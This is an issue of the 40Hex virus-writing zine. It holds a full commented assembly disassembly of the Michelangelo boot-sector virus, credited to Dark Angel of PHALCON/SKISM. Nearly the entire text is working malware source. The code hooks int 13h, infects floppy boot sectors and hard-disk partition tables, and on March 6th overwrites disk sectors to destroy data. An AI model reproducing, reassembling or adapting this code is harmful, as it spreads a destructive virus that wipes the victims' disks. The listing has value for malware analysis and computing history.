40Hex Number 8 Volume 2 Issue 4 File 006 ;This is a disassembly of the much-hyped michelangelo virus. ;As you can see, it is a derivative of the Stoned virus. The ;junk bytes at the end of the file are probably throwbacks to ;the Stoned virus. In any case, it is yet another boot sector ;and partition table infector. michelangelo segment byte public assume cs:michelangelo, ds:michelangelo ;Disassembly by Dark Angel of PHALCON/SKISM org 0 jmp entervirus highmemjmp db 0F5h, 00h, 80h, 9Fh maxhead db 2 ;used by damagestuff firstsector dw 3 oldint13h dd 0C8000256h int13h: push ds push ax or dl, dl ;default drive? jnz exitint13h ;exit if not xor ax, ax mov ds, ax test byte ptr ds:[43fh], 1 ;disk 0 on? jnz exitint13h ;if not spinning, exit pop ax pop ds pushf call dword ptr cs:[oldint13h];first call old int 13h pushf call infectdisk ;then infect popf retf 2 exitint13h: pop ax pop ds jmp dword ptr cs:[oldint13h] infectdisk: push ax push bx push cx push dx push ds push es push si push di push cs pop ds push cs pop es mov si, 4 readbootblock: mov ax,201h ;Read boot block to mov bx,200h ;after virus mov cx,1 xor dx,dx pushf call oldint13h jnc checkinfect ;continue if no error xor ax,ax pushf call oldint13h ;Reset disk dec si ;loop back jnz readbootblock jmp short quitinfect ;exit if too many failures checkinfect: xor si,si cld lodsw cmp ax,[bx] ;check if already infected jne infectitnow lodsw cmp ax,[bx+2] ;check again je quitinfect infectitnow: mov ax,301h ;Write old boot block mov dh,1 ;to head 1 mov cl,3 ;sector 3 cmp byte ptr [bx+15h],0FDh ;360k disk? je is360Kdisk mov cl,0Eh is360Kdisk: mov firstsector,cx pushf call oldint13h jc quitinfect ;exit on error mov si,200h+offset partitioninfo mov di,offset partitioninfo mov cx,21h ;Copy partition table cld rep movsw mov ax,301h ;Write virus to sector 1 xor bx,bx mov cx,1 xor dx,dx pushf call oldint13h quitinfect: pop di pop si pop es pop ds pop dx pop cx pop bx pop ax retn entervirus: xor ax,ax mov ds,ax mov ss,ax mov ax,7C00h ;Set stack to just below mov sp,ax ;virus load point sti push ds ;save 0:7C00h on stack for push ax ;later retf mov ax,ds:[13h*4] mov word ptr ds:[7C00h+offset oldint13h],ax mov ax,ds:[13h*4+2] mov word ptr ds:[7C00h+offset oldint13h+2],ax mov ax,ds:[413h] ;memory size in K dec ax ;1024 K dec ax mov ds:[413h],ax ;move new value in mov cl,6 shl ax,cl ;ax = paragraphs of memory mov es,ax ;next line sets seg of jmp mov word ptr ds:[7C00h+2+offset highmemjmp],ax mov ax,offset int13h mov ds:[13h*4],ax mov ds:[13h*4+2],es mov cx,offset partitioninfo mov si,7C00h xor di,di cld rep movsb ;copy to high memory ;and transfer control there jmp dword ptr cs:[7C00h+offset highmemjmp] ;destination of highmem jmp xor ax,ax mov es,ax int 13h ;reset disk push cs pop ds mov ax,201h mov bx,7C00h mov cx,firstsector cmp cx,7 ;hard disk infection? jne floppyboot ;if not, do floppies mov dx,80h ;Read old partition table of int 13h ;first hard disk to 0:7C00h jmp short exitvirus floppyboot: mov cx,firstsector ;read old boot block mov dx,100h ;to 0:7C00h int 13h jc exitvirus push cs pop es mov ax,201h ;read boot block mov bx,200h ;of first hard disk mov cx,1 mov dx,80h int 13h jc exitvirus xor si,si cld lodsw cmp ax,[bx] ;is it infected? jne infectharddisk ;if not, infect HD lodsw ;check infection cmp ax,[bx+2] jne infectharddisk exitvirus: xor cx,cx ;Real time clock get date mov ah,4 ;dx = mon/day int 1Ah cmp dx,306h ;March 6th je damagestuff retf ;return control to original ;boot block @ 0:7C00h damagestuff: xor dx,dx mov cx,1 smashanothersector: mov ax,309h mov si,firstsector cmp si,3 je smashit mov al,0Eh cmp si,0Eh je smashit mov dl,80h ;first hard disk mov maxhead,4 mov al,11h smashit: mov bx,5000h ;random memory area mov es,bx ;at 5000h:5000h int 13h ;Write al sectors to drive dl jnc skiponerror ;skip on error xor ah,ah ;Reset disk drive dl int 13h skiponerror: inc dh ;next head cmp dh,maxhead ;2 if floppy, 4 if HD jb smashanothersector xor dh,dh ;go to next head/cylinder inc ch jmp short smashanothersector infectharddisk: mov cx,7 ;Write partition table to mov firstsector,cx ;sector 7 mov ax,301h mov dx,80h int 13h jc exitvirus mov si,200h+offset partitioninfo ;Copy partition mov di,offset partitioninfo ;table information mov cx,21h rep movsw mov ax,301h ;Write to sector 8 xor bx,bx ;Copy virus to sector 1 inc cl int 13h ;* jmp short 01E0h db 0EBh, 32h ;?This should crash? ;The following bytes are meaningless. garbage db 1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h partitioninfo: db 42h dup (0) michelangelo ends end